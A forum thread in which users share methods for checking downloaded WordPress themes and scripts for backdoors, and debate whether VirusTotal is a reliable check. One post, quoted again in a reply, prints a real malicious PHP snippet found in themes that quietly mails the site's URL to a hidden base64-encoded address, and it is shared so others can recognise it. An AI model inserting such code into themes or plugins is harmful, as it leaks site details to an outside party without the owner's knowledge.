[ MUST READ ] SOMETHING THAT EVERYONE MUST DO BEFORE USING DOWNLOADED CODES AND THEME

***incredibleINDIA*** · (This post was last modified: 05-20-2014 12:33 PM by incredibleINDIA.)

DON'T LEAVE ANY WORD , IF YOU WANT YOUR BUSINESS/WORK TO KEEP RUNNING LIKE A BUTTER

There are so many methods to be on secure side, I am going to post each and every method i use before using any code/script/theme :

1. VIRUSTOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
(Time taken to make a post : 45 min)POST #2

2.CODE CHECKING + OTHER INFECTED CODE DETECTION METHOD
(Time taken to make a post : 30 min) [b]POST #7

[/b]3. SOON GOING TO POST ...... OTHER MEMBERS ARE MORE THAN WELCOME

HOW YOU CAN HELP ME AND OTHERS

Magic Button :

***incredibleINDIA*** · (This post was last modified: 04-30-2014 09:50 AM by incredibleINDIA.)

VIRUS TOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
--------------------------------------------------------------------------------

STEP #1 =>

Magic Button :

STEP #2 =>

Magic Button :

STEP #3 =>

Magic Button :

***semerkhet22*** · 04-28-2014, 08:42 AM

@patelnirpendra,Thank you

Nice idea, if I may I will also suggest testing on localhost as xampp, and using these wordpress plugins:
-Debug Bar Remote Requests
-Query Monitor
-Core Control or WP Crontrol
One last thing is to use WP Mail SMTP with Email Log (both are wordpress plugins).
You can also put phpMalCodeScanner.php (google it) in your wordpress blog folder.

Hope this was helpfull.

***incredibleINDIA*** · 04-28-2014, 08:58 AM

(04-28-2014 08:42 AM)semerkhet22 Wrote: @patelnirpendra,Thank you

Nice idea, if I may I will also suggest testing on localhost as xampp, and using these wordpress plugins:
-Debug Bar Remote Requests
-Query Monitor
-Core Control or WP Crontrol
One last thing is to use WP Mail SMTP with Email Log (both are wordpress plugins).
You can also put phpMalCodeScanner.php (google it) in your wordpress blog folder.

Hope this was helpfull.

thnx for it , i would add it all soon , some ideas are even new for me too
i use query monitor and TAC wordpress plugin

+5 reps added for you , now you are no more virgin

***semerkhet22*** · 04-30-2014, 07:21 AM

Hi,
I think that everyone shall be involved in this thread by patelnirpendra as we all have to gain from it.
It will be also very helpfull to all of us to share all malicious code that has been discovered in encoded and decoded fromat.

PHP Code:

add_action('wp_head','my_wpfunww7c8bb');function my_wpfunww7c8bb(){if(!username_exists('wordpress')){$addressdecode=base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}} 

This will keep sending email to wordpressslog@yandex.com as this email does not exsit your email server will keep resending.

Also search for every "wp_create_user" and delete the functiun.

Another threat is the sneaky social.png: it is not really an image as you can view the malicious code if you open it in text editor. It will insert a custom option in wp-options table to redirect to a youtube video.
Hope this will help.

***incredibleINDIA*** · 04-30-2014, 09:30 AM

(04-30-2014 07:21 AM)semerkhet22 Wrote: Hi,
I think that everyone shall be involved in this thread by patelnirpendra as we all have to gain from it.
It will be also very helpfull to all of us to share all malicious code that has been discovered in encoded and decoded fromat.

PHP Code:

add_action('wp_head','my_wpfunww7c8bb');function my_wpfunww7c8bb(){if(!username_exists('wordpress')){$addressdecode=base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

This will keep sending email to wordpressslog@yandex.com as this email does not exsit your email server will keep resending.

Also search for every "wp_create_user" and delete the functiun.

Another threat is the sneaky social.png: it is not really an image as you can view the malicious code if you open it in text editor. It will insert a custom option in wp-options table to redirect to a youtube video.
Hope this will help.

YOU FOUND IT INJECTED SOMEWHERE OR YOU MADE IT

***incredibleINDIA*** · (This post was last modified: 04-30-2014 09:53 AM by incredibleINDIA.)

CODE CHECKING + OTHER INFECTED CODE DETECTION METHOD
-------------------------------------------------------------

INTRODUCTION TO BACKDOOR :

Magic Button :

HOW TO BE ON SAFE SIDE :

Magic Button :

FILES MOST TARGETED BY HACKERS IN WORD PRESS THEMES :

Magic Button :

***semerkhet22*** · (This post was last modified: 04-30-2014 01:36 PM by semerkhet22.)

@patelnirpendra, sorry if you did not understand me.

I was pointing to the fact that we must share all known malware that we encountered while testing downloaded themes and plugins so members could identify real threats.

Sorry again for the misunderstand.

***intrepid*** · 04-30-2014, 01:43 PM

Using exploit scanner plugin, there's a lot of base64 and eval code in native Wordpress and plugins that MANY people use.

***iapetos*** · 04-30-2014, 02:12 PM

You are very wrong about using virustotal.com. I commend you for trying to help people stay safe but I have to say that anyone pushing virustotal.com as a method of detecting threats, or relying on it to determine if a file is safe, is simply giving bad advice and repeating the bad information they were fed at one time.

That site is nothing more than a warm fuzzy for for people who don't know better. It does nothing to detect 0day threats or polymorphic threats. They use featureless cli utilities that don't include the tools necessary to be a viable A/V.

We all know that A/V products in general are an over hyped method of security. Nothing beats due diligence and actually looking at the code yourself.

I would say to anyone reading the OP section on virustotal.com to disregard it as an opinion not based upon fact.

I would encourage everyone to read their FAQ, more specifically the section on statistics. It's the part where they say not to use their own product in the manner in which this thread is pushing it. Here, take a look.

Those who use VirusTotal to perform antivirus comparative analyses should know that they are making many implicit errors in their methodology, the most obvious being:

VirusTotal's antivirus engines are commandline versions, so depending on the product, they will not behave exactly the same as the desktop versions: for instance, desktop solutions may use techniques based on behavioural analysis and count with personal firewalls that may decrease entry points and mitigate propagation, etc.
In VirusTotal desktop-oriented solutions coexist with perimeter-oriented solutions; heuristics in this latter group may be more aggressive and paranoid, since the impact of false positives is less visible in the perimeter. It is simply not fair to compare both groups.
Some of the solutions included in VirusTotal are parametrized (in coherence with the developer company's desire) with a different heuristic/agressiveness level than the official end-user default configuration.

These are just three examples illustrating why using VirusTotal for antivirus testing is a bad idea, you can read more about VirusTotal and antivirus comparatives in our blog.

https://www.virustotal.com/en/faq/#statistics